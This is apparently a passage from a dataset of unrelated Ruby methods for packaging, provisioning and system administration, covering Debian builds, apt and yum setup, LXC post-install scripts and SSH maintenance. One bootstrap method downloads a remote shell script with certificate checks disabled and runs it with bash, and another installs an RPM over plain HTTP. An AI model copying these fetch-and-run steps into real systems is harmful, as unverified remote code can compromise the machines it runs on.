postinstall\n DEFAULT_BUILD_DEPENDENCIES.each do |dep|\n build_dependencies << dep\n end\n\n DEFAULT_RUNTIME_DEPENDENCIES.each do |dep|\n dependencies << dep\n end\n\n if pkginfo.build_type == :cmake\n build_dependencies << \"cmake\"\n elsif pkginfo.build_type == :orogen\n build_dependencies << \"cmake\"\n orogen_command = pkginfo.orogen_command\n elsif pkginfo.build_type == :autotools\n if pkginfo.using_libtool\n build_dependencies << \"libtool\"\n end\n build_dependencies << \"autotools-dev\" # as autotools seems to be virtual...\n build_dependencies << \"autoconf\"\n build_dependencies << \"automake\"\n build_dependencies << \"dh-autoreconf\"\n elsif pkginfo.build_type == :ruby\n if pkginfo.is_bundle?\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle ruby package\"\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n dir = cleanup_existing_dir(dir, options)\n existing_debian_dir = File.join(pkginfo.srcdir,\"debian\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES\n end\n FileUtils.mkdir_p dir\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n rendered = template.result(binding)\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n if options[:patch_dir]\n whitelist = [ \"debian/rules\",\"debian/control\",\"debian/install\" ]\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: whitelist,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to debian folder of #{pkginfo.name}\"\n end\n end\n\n ########################\n # debian/compat\n 
########################\n compatfile = File.join(dir,\"compat\")\n set_compat_level(DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile)\n end",
"def replace_znc_config env\n FileUtils.rm_rf(config_path) if File.directory?(config_path)\n FileUtils.cp_r config_template_path(env), config_path\n end",
"def packages debs, role\n run \"#{sudo} apt-get -y update && #{sudo} apt-get -y upgrade && #{sudo} apt-get install -y #{debs}\", :role => role\nend",
"def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)\n options, unknown_options = Kernel.filter_options options,\n :distributions => nil,\n :parallel_build_level => nil\n filepath = build_dir\n # cd package_name\n # tar -xf package_name_0.0.debian.tar.gz\n # tar -xf package_name_0.0.orig.tar.gz\n # mv debian/ package_name_0.0/\n # cd package_name_0.0/\n # debuild -us -uc\n # #to install\n # cd ..\n # sudo dpkg -i package_name_0.0.deb\n Packager.info \"Building #{pkg_name} locally with arguments: pkg_name #{pkg_name},\" \\\n \" debian_pkg_name #{debian_pkg_name},\" \\\n \" versioned_build_dir #{versioned_build_dir}\" \\\n \" deb_filename #{deb_filename}\" \\\n \" options #{options}\"\n\n begin\n FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub(\"/\",\"-\")) do\n if File.exist? \"debian\"\n FileUtils.rm_rf \"debian\"\n end\n if File.exist? versioned_build_dir\n FileUtils.rm_rf versioned_build_dir\n end\n FileUtils.mkdir versioned_build_dir\n\n debian_tar_gz = Dir.glob(\"*.debian.tar.gz\")\n debian_tar_gz.concat Dir.glob(\"*.debian.tar.xz\")\n if debian_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}\"\n else\n debian_tar_gz = debian_tar_gz.first\n cmd = [\"tar\", \"-xf\", debian_tar_gz]\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n orig_tar_gz = Dir.glob(\"*.orig.tar.gz\")\n if orig_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}\"\n else\n orig_tar_gz = orig_tar_gz.first\n cmd = [\"tar\"]\n cmd << \"-x\" << \"--strip-components=1\" <<\n \"-C\" << versioned_build_dir <<\n \"-f\" << orig_tar_gz\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n FileUtils.mv 'debian', versioned_build_dir + '/'\n FileUtils.chdir versioned_build_dir do\n cmd = [\"debuild\", \"-us\", \"-uc\"]\n if options[:parallel_build_level]\n cmd << \"-j#{options[:parallel_build_level]}\"\n end\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd}' failed\"\n end\n end\n\n filepath = Dir.glob(\"*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file generated in #{Dir.pwd}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{Dir.pwd}: #{filepath}\"\n else\n filepath = filepath.first\n end\n end\n rescue Exception => e\n msg = \"Package #{pkg_name} has not been packaged -- #{e}\"\n Packager.error msg\n raise RuntimeError, msg\n end\n filepath\n end",
"def generate_debian_dir_meta(name, depends, base_dir: Dir.pwd, version: \"0.1\", distribution: nil)\n existing_debian_dir = File.join(\"#{name}-#{version}\",\"debian-meta\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES_META\n end\n\n dir = File.join(base_dir, \"debian\")\n FileUtils.mkdir_p dir\n debian_name = debian_meta_name(name)\n debian_version = \"#{version}\"\n if distribution\n debian_version += '~' + distribution\n end\n\n deps_rock_packages = depends\n deps_osdeps_packages = []\n deps_nonnative_packages = []\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n begin\n rendered = template.result(binding)\n rescue\n puts \"Error in #{path}:\"\n raise\n end\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n return dir\n end",
"def set_vars\n #Set up vars with AEM package manager urls, etc.\n vars = {}\n vars[:recursive] = new_resource.recursive ? '\\\\&recursive=true' : \"\"\n vars[:file_name] = \"#{new_resource.name}-#{new_resource.version}\" +\n \"#{new_resource.file_extension}\"\n vars[:download_url] = new_resource.package_url\n vars[:file_path] = \"#{Chef::Config[:file_cache_path]}/#{vars[:file_name]}\"\n vars[:user] = new_resource.user\n vars[:password] = new_resource.password\n vars[:port] = new_resource.port\n vars[:group_id] = new_resource.group_id\n vars[:upload_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -F\" +\n \" package=@#{vars[:file_path]} http://localhost:\" +\n \"#{vars[:port]}/crx/packmgr/service/.json?cmd=upload\"\n vars[:delete_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=delete\"\n vars[:install_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=install#{vars[:recursive]}\"\n vars[:activate_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=replicate\"\n vars[:uninstall_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=uninstall\"\n\n vars\nend",
"def update\n tmp_file = Rails.root.join('tmp', 'deployment-rc.yml')\n self.to_file tmp_file\n self.class.replace tmp_file\n end",
"def post_update_extension volume_root, options\n if !options[:extensions][:up_to_date] and options[:extensions][:postinstall]\n IESD::Packages::OSInstall.new(File.join(volume_root, PACKAGES, \"OSInstall.pkg\")).postinstall_extensions options[:extensions]\n end\n if !options[:mach_kernel] and File.exist? (mach_kernel = File.join(volume_root, \"mach_kernel\"))\n system(\"/usr/bin/env\", \"rm\", mach_kernel)\n end\n end",
"def bootstrap\n @commands += [\n \"export HOME=`pwd`\" ,\"\\n\",\n \"wget --no-check-certificate https://raw.githubusercontent.com/bcwik9/ScriptsNStuff/master/setup_dev_server.sh && bash setup_dev_server.sh\", \"\\n\"\n ]\n end",
"def update\n app_dir = app_dir\n # there's probably a git gem we could use here\n system \"cd #{app_dir} && git pull\" unless app_dir.nil?\n system \"cd #{File.dirname(__FILE__)} && git pull\"\nend",
"def path_boot\n case node['platform']\n when \"exherbo\", \"ubuntu\", \"arch\"\n return \"/etc/modules-load.d/#{new_resource.name}.conf\"\n when \"debian\", \"ubuntu\"\n return \"/etc/modules\"\n end\nend",
"def setup_path\n # The Java Buildpack for WLS creates the complete domain structure and other linkages during staging.\n # The directory used for staging is at /tmp/staged/app. But the actual DEA execution occurs at /home/vcap/app. This discrepancy can result in broken paths and non-startup of the server.\n # So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution\n # Also, this script needs to be invoked before starting the server as it will create the links and also tweak the server args\n # (to listen on correct port, use user supplied jvm args)\n\n File.open(@application.root.to_s + '/' + SETUP_ENV_SCRIPT, 'w') do |f|\n\n f.puts '#!/bin/bash '\n f.puts ' '\n f.puts 'function fcomp() '\n f.puts '{ '\n f.puts ' awk -v n1=$1 -v n2=$2 \\'BEGIN{ if (n1 == n2) print \"yes\"; else print \"no\"}\\' '\n f.puts '} '\n f.puts ' '\n f.puts 'function multiplyArgs() '\n f.puts '{ '\n f.puts ' input1=$1 '\n f.puts ' input2=$2 '\n f.puts ' mulResult=`echo $input1 $input2 | awk \\'{printf \"%d\", $1*$2}\\' ` '\n f.puts '} '\n f.puts ' '\n f.puts 'function divideArgs() '\n f.puts '{ '\n f.puts ' input1=$1 '\n f.puts ' input2=$2 '\n f.puts ' divResult=`echo $input1 $input2 | awk \\'{printf \"%.2f\", $1/$2}\\' ` '\n f.puts '} '\n f.puts ' '\n f.puts 'function scaleArgs() '\n f.puts '{ '\n f.puts ' inputToken=$1 '\n f.puts ' factor=$2 '\n f.puts ' numberToken=`echo $inputToken | tr -cd [0-9] ` '\n f.puts ' argPrefix=`echo $inputToken | sed -e \\'s/m$//g\\' | tr -cd [a-zA-Z-+:=] ` '\n f.puts ' multiplyArgs $numberToken $factor '\n f.puts ' # Result saved in mulResult variable '\n f.puts ' scaled_number=$mulResult '\n f.puts ' scaled_token=${argPrefix}${scaled_number}m '\n f.puts '} '\n f.puts ' '\n f.puts '# There are 5 things handled by this script '\n f.puts ' '\n f.puts '# 1. Create links to mimic staging env and update scripts with jvm options '\n f.puts '# The Java Buildpack for WLS creates complete domain structure and other linkages during staging at '\n f.puts '# /tmp/staged/app location '\n f.puts '# But the actual DEA execution occurs at /home/vcap/app. '\n f.puts '# This discrepancy can result in broken paths and non-startup of the server. '\n f.puts '# So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution '\n f.puts '# Create paths that match the staging env, as otherwise scripts will break!! '\n f.puts 'if [ ! -d \\\"/tmp/staged\\\" ]; then '\n f.puts ' /bin/mkdir /tmp/staged '\n f.puts 'fi; '\n f.puts 'if [ ! -d \\\"/tmp/staged/app\\\" ]; then '\n f.puts ' /bin/ln -s /home/vcap/app /tmp/staged/app '\n f.puts 'fi; '\n f.puts ' '\n end\n end",
"def populate_lxc_post()\n post_list = []\n post_list.push(\"#!/bin/sh\")\n post_list.push(\"# Install additional pacakges\")\n post_list.push(\"\")\n post_list.push(\"export TERM=vt100\")\n post_list.push(\"export LANGUAGE=en_US.UTF-8\")\n post_list.push(\"export LANG=en_US.UTF-8\")\n post_list.push(\"export LC_ALL=en_US.UTF-8\")\n post_list.push(\"locale-gen en_US.UTF-8\")\n post_list.push(\"\")\n post_list.push(\"if [ \\\"`lsb_release -i |awk '{print $3}'`\\\" = \\\"Ubuntu\\\" ] ; then\")\n post_list.push(\" dpkg-reconfigure locales\")\n post_list.push(\" cp /etc/apt/sources.list /etc/apt/sources.list.orig\")\n post_list.push(\" sed -i 's,#{$default_ubuntu_mirror},#{$local_ubuntu_mirror},g' /etc/apt/sources.list.orig\")\n post_list.push(\" apt-get install -y avahi-daemon\")\n post_list.push(\" apt-get install -y libterm-readkey-perl 2> /dev/null\")\n post_list.push(\" apt-get install -y puppet 2> /dev/null\")\n post_list.push(\" apt-get install -y nfs-common 2> /dev/null\")\n post_list.push(\" apt-get install -y openssh-server 2> /dev/null\")\n post_list.push(\" apt-get install -y python-software-properties 2> /dev/null\")\n post_list.push(\" apt-get install -y software-properties-common 2> /dev/null\")\n post_list.push(\"fi\")\n post_list.push(\"\")\n repo_file = \"/etc/yum.repos.d/CentOS-Base.repo\"\n post_list.push(\"if [ \\\"`lsb_release -i |awk '{print $3}'`\\\" = \\\"Centos\\\" ] ; then\")\n post_list.push(\" sed -i 's/^mirror./#&/g' #{repo_file}\")\n post_list.push(\" sed -i 's/^#\\\\(baseurl\\\\)/\\\\1/g' #{repo_file}\")\n post_list.push(\" sed -i 's,#{$default_centos_mirror},#{$local_centos_mirror}' #{repo_file}\")\n post_list.push(\" yum -y install avahi-daemon\")\n post_list.push(\" chkconfig avahi-daemon on\")\n post_list.push(\" service avahi-daemon start\")\n post_list.push(\" rpm -i http://fedora.mirror.uber.com.au/epel/5/i386/epel-release-5-4.noarch.rpm\")\n post_list.push(\" yum -y install puppet\")\n post_list.push(\"fi\")\n post_list.push(\"\")\n return post_list\nend",
"def copy_config\n with_deb_dir do\n mkdir [ 'etc/init.d', 'etc/kafka', 'usr/lib/kafka', 'var/log/kafka',\n 'etc/security/limits.d', 'etc/default', 'etc/logrotate.d' ]\n end\n cp_conf \"default\", \"etc/default/kafka\"\n cp_conf \"init.debian\", \"etc/init.d/kafka\"\n cp_conf \"kafka-nofiles.conf\", \"etc/security/limits.d/kafka-nofiles.conf\"\n cp_conf 'logrotate', 'etc/logrotate.d/kafka'\n end",
"def save_stage_one\n\tunless File.exists? @builddir + \"/stage01.tar.xz\"\n\t\t### Dir.chdir(@builddir + \"/stage01\")\n\t\t# system \"tar -C \" + @builddir + \"/stage01 -cvjf \" + @builddir + \"/stage01/chroot.tbz chroot\"\n\t\t# system \"mysqldump --add-drop-table --password='\" + @dbpass + \"' -u '\" + @dbuser + \"' '\" + @dbname + \"' > chroot.sql \"\n\t\t# system \"bzip2 -c \" + @builddir + \"/lesslinux.sqlite > \" + @builddir + \"/stage01/chroot.sqlite.bz2\"\n\t\tsystem \"tar -C \" + @builddir + \"/ -cvJf \" + @builddir + \"/stage01.tar.xz stage01/chroot lesslinux.sqlite\"\n\tend\nend",
"def initialize_reprepro_conf_dir(release_prefix)\n if !@reprepro_lock.owned?\n raise ThreadError.new\n end\n \n conf_dir = File.join(deb_repository, release_prefix, \"conf\")\n if File.exist? conf_dir\n Packager.info \"Reprepo repository exists: #{conf_dir}\"\n else\n Packager.info \"Initializing reprepo repository in #{conf_dir}\"\n system(\"sudo\", \"mkdir\", \"-p\", conf_dir, :close_others => true)\n\n user = Etc.getpwuid(Process.uid).name\n Packager.info \"Set owner #{user} for #{deb_repository}\"\n system(\"sudo\", \"chown\", \"-R\", user, deb_repository, :close_others => true)\n system(\"sudo\", \"chown\", \"-R\", user, deb_repository + \"/\", :close_others => true)\n system(\"sudo\", \"chmod\", \"-R\", \"755\", conf_dir, :close_others => true)\n end\n\n distributions_file = File.join(conf_dir, \"distributions\")\n if !File.exist?(distributions_file)\n File.open(distributions_file,\"w\") do |f|\n Config.linux_distribution_releases.each do |release_name, release|\n f.write(\"Codename: #{release_name}\\n\")\n f.write(\"Architectures: #{Config.architectures.keys.join(\" \")} source\\n\")\n f.write(\"Components: main\\n\")\n f.write(\"UDebComponents: main\\n\")\n f.write(\"Tracking: minimal\\n\")\n f.write(\"Contents:\\n\\n\")\n end\n end\n end\n end",
"def install_dev_repo_on(host, package, sha, repo_configs_dir)\n platform = host['platform'] =~ /^(debian|ubuntu)/ ? host['platform'].with_version_codename : host['platform']\n platform_configs_dir = File.join(repo_configs_dir, platform)\n\n case platform\n when /^(fedora|el|centos)-(\\d+)-(.+)$/\n variant = (($1 == 'centos') ? 'el' : $1)\n fedora_prefix = ((variant == 'fedora') ? 'f' : '')\n version = $2\n arch = $3\n\n #hack for https://tickets.puppetlabs.com/browse/RE-1990\n # Previously this used `host.is_pe?`, but with AIO this is no longer\n # reliable. Defaulting to `true` since these tests only happen in PE.\n if true\n pattern = \"pl-%s-%s-repos-pe-%s-%s%s-%s.repo\"\n else\n pattern = \"pl-%s-%s-%s-%s%s-%s.repo\"\n end\n repo_filename = pattern % [\n package,\n sha,\n variant,\n fedora_prefix,\n version,\n arch\n ]\n\n repo = fetch(\n \"http://builds.puppetlabs.lan/%s/%s/repo_configs/rpm/\" % [package, sha],\n repo_filename,\n platform_configs_dir\n )\n\n scp_to(host, repo, '/etc/yum.repos.d/')\n\n when /^(debian|ubuntu)-([^-]+)-(.+)$/\n variant = $1\n version = $2\n arch = $3\n\n list = fetch(\n \"http://builds.puppetlabs.lan/%s/%s/repo_configs/deb/\" % [package, sha],\n \"pl-%s-%s-%s.list\" % [package, sha, version],\n platform_configs_dir\n )\n\n scp_to host, list, '/etc/apt/sources.list.d'\n on host, 'apt-get update'\n else\n host.logger.notify(\"No repository installation step for #{platform} yet...\")\n end\n end",
"def update_software(ssh_session,hostname,username,password,local_version,depot_version,filename,mode,doaction,depot_url,reboot)\n update_available = compare_versions(local_version,depot_version,mode)\n if update_available == \"y\" and mode != \"check\"\n if filename.match(/[A-z]/)\n patch_file = File.basename(filename)\n depot_dir = \"/scratch/downloads\"\n depot_file = depot_dir+\"/\"+patch_file\n (ssh_session,output) = ssh_session_exec(ssh_session,\"mkdir #{depot_dir}\")\n puts \"Copying local file \"+filename+\" to \"+hostname+\":\"+depot_file\n Net::SCP.upload!(hostname, username, filename, depot_file, :ssh => { :password => password })\n else\n depot_file = depot_url\n end\n if doaction != \"y\"\n while doaction !~ /y|n/\n print \"Install update [y,n]: \"\n doaction = gets.chomp\n end\n end\n if doaction == \"y\"\n puts \"Installing \"+depot_version+\" from \"+depot_file\n (ssh_session,output) = ssh_session_exec(ssh_session,\"esxcli software vib update -d=#{depot_file}\")\n else\n puts \"Performing Dry Run - No updates will be installed\"\n (ssh_session,output) = ssh_session_exec(ssh_session,\"esxcli software vib update -d=#{depot_file} --dry-run\")\n end\n puts output\n if output.match(/Reboot Required: true/) and reboot == \"y\"\n puts \"Rebooting\"\n (ssh_session,output) = ssh_session_exec(ssh_session,\"reboot\")\n end\n end\n return ssh_session\nend",
"def update_version(branch, version, opts={})\n dir = File.join(branch, version)\n status \"Update version #{dir}\"\n\n # initialize directory\n run \"rm -rf #{dir}\"\n run \"mkdir -p #{dir}\"\n run \"cp docker-entrypoint.sh #{dir}\"\n\n if branch == \"ensocoin\"\n run \"sed -i 's/printtoconsole=1/addnode=178.88.115.118\\\\\\n addnode=194.87.146.58\\\\\\n printtoconsole=1/' #{dir}/docker-entrypoint.sh\"\n\n run \"sed -i 's/bitcoin.conf/ensocoin.conf/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-cli/ensocoin-cli/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-tx/ensocoin-tx/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/test_bitcoin/test_ensocoin/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoind/ensocoind/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/\\\\\\.bitcoin/.ensocoin/' #{dir}/docker-entrypoint.sh\"\n elsif branch == \"thebestcoin\"\n run \"sed -i 's/^\\\\(\\\\s*\\\\)printtoconsole=1/\\\\1addnode=5.230.11.232\\\\\\n\\\\1addnode=5.230.11.233\\\\\\n\\\\1printtoconsole=1/' #{dir}/docker-entrypoint.sh\"\n\n run \"sed -i 's/bitcoin.conf/thebestcoin.conf/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-cli/thebestcoin-cli/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-tx/thebestcoin-tx/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/test_bitcoin/test_thebestcoin/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoind/thebestcoind/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/\\\\\\.bitcoin/.thebestcoin/' #{dir}/docker-entrypoint.sh\"\n end\n\n # render Dockerfile\n opts[:version] = version\n opts[:home] = '.bitcoin'\n opts[:ports] = '8332 8333 18332 18333'\n\n if branch == \"ensocoin\"\n opts[:home] = '.ensocoin'\n opts[:ports] = '7992 7993 17992 17993'\n elsif branch == \"thebestcoin\"\n opts[:home] = '.thebestcoin'\n opts[:ports] = '8801 8802 18801 18802'\n end\n\n dockerfile = ERB.new(File.read(\"Dockerfile.erb\"), nil, \"-\")\n result = dockerfile.result(OpenStruct.new(opts).instance_eval { binding })\n File.write(File.join(dir, \"Dockerfile\"), result)\nend",
"def update_instace_os\n ssh_command = 'sudo apt-get update &&sudo apt-get dist-upgrade -qq && sudo apt-get autoremove -y'\n result = ''\n Net::SSH.start(get_access_ip, 'ubuntu', keys: @aws_setup_information[@environment.to_sym][:keyPath], timeout: @ssh_timeout_period) do |ssh|\n ssh.exec(ssh_command) do |_channel, _stream, data|\n result += data\n end\n end\n result\n end",
"def apt_get_update_install\n @app.packages.present? ? install_additional_packages : update_apt\n end",
"def change_boot_order\n return unless provider == :libvirt\n system \"sudo virsh destroy #{IMAGE_NAME}\" # shutdown\n system \"sudo virsh dumpxml #{IMAGE_NAME} >#{libvirt_definition_path}\"\n system \"sed -i.bak s/dev=\\\\'cdrom\\\\'/dev=\\\\'cdrom_save\\\\'/g #{libvirt_definition_path}\"\n system \"sed -i.bak s/dev=\\\\'hd\\\\'/dev=\\\\'cdrom\\\\'/g #{libvirt_definition_path}\"\n system \"sed -i.bak s/dev=\\\\'cdrom_save\\\\'/dev=\\\\'hd\\\\'/g #{libvirt_definition_path}\"\n system \"sudo virsh define #{libvirt_definition_path}\"\n end",
"def configure_vs_repo(options)\n if options['host-os-name'].to_s.match(/SunOS/)\n check_fs_exists(options,options['repodir'])\n options['netbootdir'] = options['tftpdir']+\"/\"+options['service']\n if not File.symlink?(options['repodir'])\n if options['verbose'] == true\n handle_output(options,\"Information:\\tChecking vSphere net boot directory\")\n end\n check_dir_owner(options,options['netbootdir'],options['uid'])\n File.symlink(options['repodir'],options['netbootdir'])\n end\n end\n if options['host-os-name'].to_s.match(/Linux/)\n options['netbootdir'] = options['tftpdir']+\"/\"+options['service']\n check_fs_exists(options,options['netbootdir'])\n if !File.exist?(options['repodir'])\n if options['verbose'] == true\n handle_output(options,\"Information:\\tChecking vSphere net boot directory\")\n end\n check_dir_owner(options,options['netbootdir'],options['uid'])\n File.symlink(options['netbootdir'],options['repodir'])\n end\n end\n check_dir = options['repodir']+\"/upgrade\"\n if options['verbose'] == true\n handle_output(options,\"Information:\\tChecking directory #{check_dir} exists\")\n end\n if not File.directory?(check_dir)\n mount_iso(options)\n options['repodir'] = options['tftpdir']+\"/\"+options['service']\n copy_iso(options)\n umount_iso(options)\n end\n options['clientdir'] = options['clientdir']+\"/\"+options['service']\n ovf_file = options['clientdir']+\"/vmware-ovftools.tar.gz\"\n if not File.exist?(ovf_file)\n wget_file(options,options['ovftarurl'],ovf_file)\n if options['host-os-uname'].match(/RedHat/) and options['host-os-version'].match(/^7|^6\\.7/)\n message = \"Information:\\tFixing permission on \"+ovf_file\n command = \"chcon -R -t httpd_sys_rw_content_t #{ovf_file}\"\n execute_command(options,message,command)\n end\n end\n return\nend",
"def update_appd_cookbook\n @ssh.exec! \"cd #{APPD_COOKBOOK_PATH}; git pull origin master\", sudo: true\n chef_exec \"berks install --path #{@cookbook_path.first} --berksfile #{APPD_COOKBOOK_PATH}/Berksfile\"\n end",
"def apt_get_update_script\n <<-ENDSCRIPT\n if [[ ! -f /tmp/apt_sources.md5 ]]; then\n apt-get -q update\n\n md5sum /etc/apt/sources.list > /tmp/apt_sources.md5\n md5sum /etc/apt/sources.list.d/*.list >> /tmp/apt_sources.md5\n else\n md5sum /etc/apt/sources.list > /tmp/apt_sources_compare.md5\n md5sum /etc/apt/sources.list.d/*.list >> /tmp/apt_sources_compare.md5\n\n if [[ `diff /tmp/apt_sources.md5 /tmp/apt_sources_compare.md5` ]]; then\n apt-get -q update\n fi\n\n mv /tmp/apt_sources_compare.md5 /tmp/apt_sources.md5\n fi\n ENDSCRIPT\n end",
"def make(output_dir)\n create_debian_dir\n\n arch = @config.architecture\n package_name = @config.package + \"_#{@config.full_version}_#{arch}.deb\"\n package_path = Pathname.new(output_dir) + package_name\n\n system(\"fakeroot dpkg-deb -b \\\"#{@config.root}\\\" \\\"#{package_path}\\\"\")\n\n package_path\n end",
"def decrypt_vault_and_modify_env\n begin\n puts 'Decrypting vault and binding environment parameters...'\n crypto = GPGME::Crypto.new\n fname = File.open '../_config/secrets.yaml.gpg'\n\n secrets = YAML.load(crypto.decrypt(fname).to_s)\n\n secrets.each do |k, v|\n ENV[k] = v\n puts \" - Bound environment variable '#{k}' from decrypted vault\"\n end\n puts 'Succesfully decrypted vault and bound environment parameters.'\n rescue GPGME::Error => e\n abort \"Unable to decrypt vault (#{e})\"\n end\nend",
"def update_hostname(name)\n File.open(File.join(KVM_MOUNT_POINT, name, 'etc', 'hostname'), 'w') do |file|\n file.puts name.split('.').first\n end\nend",
"def branded_zone_post_install(options)\n options['zonedir'] = options['zonedir']+\"/\"+options['name']\n if File.directory?(options['zonedir'])\n options['clientdir'] = options['zonedir']+\"/root\"\n var_dir = \"/var/tmp\"\n tmp_dir = options['clientdir']+\"/\"+var_dir\n post_file = tmp_dir+\"/postinstall.sh\"\n tmp_file = \"/tmp/zone_\"+options['name']\n pkg_name = \"pkgutil.pkg\"\n pkg_url = $local_opencsw_mirror+\"/\"+pkg_name\n pkg_file = tmp_dir+\"/\"+pkg_name\n wget_file(options,pkg_url,pkg_file)\n file = File.open(tmp_file,\"w\")\n file.write(\"#!/usr/bin/bash\\n\")\n file.write(\"\\n\")\n file.write(\"# Post install script\\n\")\n file.write(\"\\n\")\n file.write(\"cd #{var_dir} ; echo y |pkgadd -d pkgutil.pkg CSWpkgutil\\n\")\n file.write(\"export PATH=/opt/csw/bin:$PATH\\n\")\n file.write(\"pkutil -i CSWwget\\n\")\n file.write(\"\\n\")\n file.close\n message = \"Information:\\tCreating post install script \"+post_file\n command = \"cp #{tmp_file} #{post_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n else\n handle_output(options,\"Warning:\\tZone #{options['name']} doesn't exist\")\n quit(options)\n end\n return\nend",
"def config_local\n if Process.uid != 0\n warn \"Apache configuration must run as root user\"\n exit 1\n end\n\n TemplateWriter.process(\n \"config-local.yml.erb\",\n \"/srv/Portus/config/config-local.yml\",\n binding\n )\n FileUtils.chown(\"root\", \"www\", \"/srv/Portus/config/config-local.yml\")\n FileUtils.chmod(0o640, \"/srv/Portus/config/config-local.yml\")\n end",
"def configure(sb_name)\n puts \"BS: updating sandbox repository\".cyan\n rootfs = \"/var/lib/lxc/#{sb_name}/rootfs\"\n system(\"sudo /usr/sbin/chroot #{rootfs} /bin/bash -c \\\"apt-get update\\\"\")\n system(\"sudo /usr/sbin/chroot #{rootfs} apt-get -q -y install puppet lxc make build-essential libboost-test-dev\")\n puts \"BS: configuring sandbox\".cyan\n system(\"sudo cp /opt/bs/files/lxc-insider.pp #{rootfs}/etc/puppet/manifests/lxc-insider.pp\")\n system(\"sudo lxc-execute -n #{sb_name} puppet apply /etc/puppet/manifests/lxc-insider.pp\")\n puts \"BS: sandbox configured\".cyan\n end",
"def update_pacman_if_needed\n if self['platform'] =~ /archlinux/\n if @pacman_needs_update\n execute(\"pacman --sync --noconfirm --noprogressbar --refresh --sysupgrade --ignore linux --ignore linux-docs --ignore linux-headers\")\n @pacman_needs_update = false\n end\n end\n end",
"def restart_atd(vp)\n system \"ssh uw_revtr2@#{vp} 'sudo /etc/init.d/atd restart > /dev/null 2>&1'\"\n end",
